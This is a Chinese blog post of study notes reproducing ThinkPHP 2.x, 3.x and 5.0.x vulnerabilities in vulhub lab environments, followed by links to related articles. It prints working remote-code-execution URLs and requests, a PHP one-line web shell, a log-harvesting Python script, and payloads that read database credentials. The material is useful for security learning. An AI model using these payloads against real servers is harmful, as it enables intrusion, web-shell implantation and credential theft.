寒假学习第11天--中间件漏洞--vulhub--thinkphp全系列

已于 2024-01-22 16:43:24 修改
阅读量1.1k 收藏 23
点赞数 17
文章标签: 学习 安全
于 2024-01-22 16:14:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73581247/article/details/135733528
版权

提示:所分享内容仅用于每一个爱好者之间的技术讨论及教育目的,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本作者不承担相应的后果。

文章目录

  • 1.ThinkPHP 2.x 任意代码执行漏洞
  • 2. ThinkPHP 3.x 日志泄露漏洞
  • 3 ThinkPHP5 5.0.23远程代码执行漏洞
    • 4.ThinkPHP5 5.0.20远程代码执行漏洞
  • 总结

1.ThinkPHP 2.x 任意代码执行漏洞

漏洞成因:ThinkPHP 2.x版本中,使用preg_replace的 /e 模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

参考链接:https://www.freebuf.com/sectool/223149.html
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
提示:这里的/e在php中表示表示可执行模式

1.2、利用步骤
1、启动docker环境,启动thinkphp环境,没有配置环境的可以看这个链接https://blog.csdn.net/luluoluoa/article/details/115416478
2、访问ip+端口
在这里插入图片描述
提示:这里在PHP中${}里面可以执行函数

ThinkPHP的url规则:

thinkphp 所有的主入口文件默认访问index控制器(模块)

thinkphp 所有的控制器默认执行index动作(方法)

存在漏洞的static public function
dispatch(),叫URL映射控制器,也就是URL访问的路径是映射到哪个控制器下。

3、既然可以执行函数,我们可以构建payload,

http://192.168.190.128:8080/index.php/?s=/Index/index/name/${@phpinfo()}

注意上面的第一个index是模块,第二个index是方法,name是操作名,后面的是操作

在这里插入图片描述
4、构建一句话木马,并用蚁剑连接

http://192.168.190.128:8080/index.php/?s=/Index/index/name/${print(@eval($_POST[hacker]))}

在这里插入图片描述

2. ThinkPHP 3.x 日志泄露漏洞

漏洞原因
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关
ThinkPHP默认安装后,也会在Runtime目录下生成日志
日志很容易被猜解到,而且日志里面有执行SQL语句的记录

漏洞利用过程

日志存储结构:
项目名\Runtime\Logs\Home\年份_月份_日期.log
THINKPHP3.2 日志结构:Application\Runtime\Logs\Home\16_09_09.log
THINKPHP3.1 日志结构:Runtime\Logs\Home\16_09_09.log
在这里插入图片描述
有的时候我们可以在用户登录日志中找到用户名和密码
放个参考链接
https://blog.csdn.net/weixin_40412037/article/details/113885372
github工具
https://github.com/JaneMandy/ThinkPHP_RCE
这是一款pthinkphp综合漏洞利用工具箱。
也可以用python代码

import requests
import sys


def logfile(year):
  
    logfilename = []
    for m in range(1, 13):
        for d in range(1, 32):
            m = str(m).rjust(2, '0')
            d = str(d).rjust(2, '0')
            logfilename.append("%s_%s_%s.log" % (year, m, d))
    return logfilename


def main():
    year = sys.argv[1]
    print(year)
    logfilename = logfile(year)
    for logname in logfilename:
        url = "http://www.webhack123.com/App/Runtime/Logs/" + logname //这里需要改成你的日志文件
        r = requests.get(url)
        if r.status_code == 200:
            print(url)
            with open(logname, "w", encoding="utf-8") as f:
                f.write(r.text)


if __name__ == '__main__':
    main()

3 ThinkPHP5 5.0.23远程代码执行漏洞

漏洞成因
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

参考链接 https://xz.aliyun.com/t/3570

漏洞利用过程
在这里插入图片描述
md,复现不出来,用工具扫出来了,但是贴一下poc

POST /index.php?s=captcha HTTP/1.1
Host: you_ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

在这里插入图片描述

4.ThinkPHP5 5.0.20远程代码执行漏洞

漏洞原因
版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
漏洞复现
https://www.cnblogs.com/f-carey/p/17343752.html#tid-dXCjFT
https://xz.aliyun.com/t/3570

执行phpinfo:http://192.168.190.128:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行系统命令:http://192.168.190.128:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

查看数据库用户:http://192.168.190.128:8080/?s=.|think\config/get&name=database.username

查看数据库密码:http://192.168.190.128:8080/?s=.|think\config/get&name=database.password

总结

个人笔记,大佬勿喷,小六花祝你每天开心

fann@qiu
关注
  • 17
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
thinkPHP3.x日志泄露漏洞复现
千寻的博客
12-18 3096
漏洞名称 thinkPHP3.x日志泄露 漏洞描述 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 ThinkPHP默认安装后,也会在Runtime目录下生成日志 日志很容易被猜解到,而且日志里面有执行SQL语句的记录 影响版本 thinkPHP3.2 thinkPHP3. 漏洞分析 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runti
thinkphp日志泄漏漏洞_Thinkphp5-x远程代码执行漏洞分析
weixin_39939668的博客
12-20 949
漏洞介绍Thinkphp5.x版本(5.0.20)中没有对路由中的控制器进行严格过滤,在存在admin、index模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,完成远程代码执行。影响版本THINKPHP 5.0.5-5.0.22THINKPHP 5.1.0-5.1.30漏洞分析这里选择对5.0.20版本进行分析,关键函数开头/thinkph...
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
thinkphp3 与thinkphp5 日志信息泄露检测脚本.zip
02-20
thinkphp3 与thinkphp5 日志信息泄露检测脚本,亲测有效可用,如有侵权,请联系CSDN管理员删除即可
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 2431
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
Goby 漏洞更新 |ThinkPHP Debug 模式日志信息泄露漏洞
m0_46699477的博客
04-21 1221
ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架。ThinkPHP Debug 模式存在日志信息泄露漏洞,在开启Debug的情况下会在Runtime目录下生成日志,攻击者通过构造特殊URL地址,读取日志敏感信息。
thinkphp-bjyblog 开源博客系统 v1.1
10-11
thinkphp-bjyblog 开源博客系统 v1.1》是一个基于ThinkPHP框架构建的个人博客系统,专为开发者和学习者设计。这个开源项目旨在帮助用户建立自己的知识整理平台,同时也为初学者提供了一个深入理解ThinkPHP框架的...
基于ThinkPHP8和Element-Plus的在线教育平台设计源码
04-04
本设计源码提供了一个基于ThinkPHP8和Element-Plus的在线教育平台。项目包含9313个文件,主要使用PHP编程语言,并包含了JavaScript、Vue、CSS、Java、微信小程序、C#、HTML、TypeScript和Shell。文件类型包括3516个...
DSCMS-Thinkphp内容管理系统 v1.0版
10-09
DScms是基于TP5.0框架开发,采用 PHP + Mysql 架构,是一款适合企业网站建设的 cms 建站系统,功能全面、 SEO 友好、双语言。现开发有五大功能模块:系统设置、用户管理、类容管理、运营
计算机后端-ThinkPHP5商城系统+项目实战jquery04.3CSS.wmv
05-23
计算机后端-ThinkPHP5商城系统+项目实战jquery04.3CSS.wmv
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
Thinkphp竞-技游戏展示工作室网站模板
07-01
【标题】"Thinkphp竞技游戏展示工作室网站模板"是一个基于Thinkphp框架开发的网站模板,专为竞技游戏工作室设计,用于展示游戏项目、团队信息、服务内容等。它结合了竞技游戏元素,提供了吸引玩家和潜在客户的专业...
DSCMS-Thinkphp内容管理系统(含wap+微信) v1.3版
11-06
DScms是基于TP5.0框架开发,采用 PHP + Mysql 架构,是一款适合企业网站建设的 cms 建站系统,功能全面、 SEO 友好、双语言。现开发有五大功能模块:系统设置、用户管理、类容管理、运营
fast-think:高效、快速的thinkphp开发工具
05-29
fast-think简介fast-think是基于thinkphp封装的,用于快速高效的进行业务开发的模式,包含了自定义的command命令、自定义查询构造器,文档生成器等等。仅仅需要一条MySQL建表语句,代码、注释支持一键自动生成,接口...
计算机后端-ThinkPHP5商城系统+项目实战. xml教程3.1PHP解析XML.wmv
05-23
计算机后端-ThinkPHP5商城系统+项目实战. xml教程3.1PHP解析XML.wmv
ThinkPHP漏洞总结(利用)
热门推荐
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
THINKPHP5近期暴露的漏洞
weixin_30550081的博客
02-26 138
这个THINKPHP5的漏洞涉及好几个版本,我测试中5.0.21和5.0.22都有,据说是5.0 ~ 5.0.23之间的版本都存在,这个漏洞可以执行写文件的操作。 当然了,赶紧升级框架到安全版本是比较好的方式,不过我这边测试了一下,发现确实可以通过url访问注入进行执行写文件操作,例如 http://你的域名/public/index.php?s=/index/\think\app/invok...
ThinkPHP使用不当可能造成敏感信息泄露
weixin_30249203的博客
07-22 476
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,如果debug模式不关,可直接输入路径造成目录遍历。 ThinkPHP3.2结构:Application\Runtime\Logs\Home\17_07_22.log ThinkPHP3.1结构:Runtime\Logs\Home\17_07_22.log 可以看到是 :项目名\Runtime\Logs\Home\年份...
thinkphp-errors漏洞
最新发布
04-08
thinkphp-errors漏洞是指在使用ThinkPHP框架时存在的一种安全漏洞。该漏洞的主要原因是在错误处理机制中,未对异常信息进行适当的过滤和处理,导致攻击者可以通过构造恶意请求,获取敏感信息或执行任意代码。 具体来说,当应用程序发生错误时,ThinkPHP框架会将错误信息显示在页面上,包括敏感信息如数据库连接信息、文件路径等。攻击者可以利用这些信息进行进一步的攻击,比如尝试注入恶意代码、获取数据库敏感信息等。 为了防止thinkphp-errors漏洞的利用,可以采取以下措施: 1. 关闭错误显示:在生产环境中,应该关闭错误显示,避免将敏感信息暴露给攻击者。可以在配置文件中设置`app_debug`为`false`。 2. 自定义错误页面:可以自定义错误页面,将错误信息隐藏起来,同时提供友好的提示信息给用户。 3. 过滤异常信息:在异常处理机制中,对异常信息进行适当的过滤和处理,确保不会泄露敏感信息。 4. 及时更新框架版本:及时关注ThinkPHP官方发布的安全更新,并及时升级框架版本,以修复已知的漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值